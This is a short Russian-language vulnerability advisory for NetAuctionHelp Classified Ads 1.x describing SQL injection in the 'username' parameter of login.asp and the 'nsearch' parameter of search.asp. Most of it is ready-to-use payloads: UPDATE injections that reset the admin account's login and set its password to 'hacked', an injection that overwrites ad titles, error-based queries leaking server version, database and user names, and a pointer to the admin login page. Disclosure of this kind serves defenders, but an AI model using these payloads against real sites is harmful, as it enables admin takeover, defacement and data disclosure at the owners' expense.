Программа: NetAuctionHelp Classified Ads 1.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре "username" сценарием login.asp (когда "reminder" установлен в "Password Reminder") и в параметре "nsearch" сценарием search.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Пример:
Необходимые таблицы:
tblMember.id
tblMember.login
tblMember.pswd
Уязвимая страница: Login.asp
Выполните этот запрос для забытого пароля:
-1' UPDATE tblMember Set login= 'admin' where(id='1');--
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--
Вы получаете админа с паролем hacked.
Это может помочь атакующему получить больше информации на странице search.asp.
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'
Пример:
-1' update tblAd set title= 'hacked' where(id='1');--
addetl.asp?id=1 выведет HACKED.
1' or 1=convert(int,@@version)--
1' or 1=convert(int,@@servername)--
1' or 1=convert(int,db_name())--
1' or 1=convert(int,user_name())--
1' or 1=convert(int,system_user)--
Подсказка: /auctionAdmin/admLogin.asp
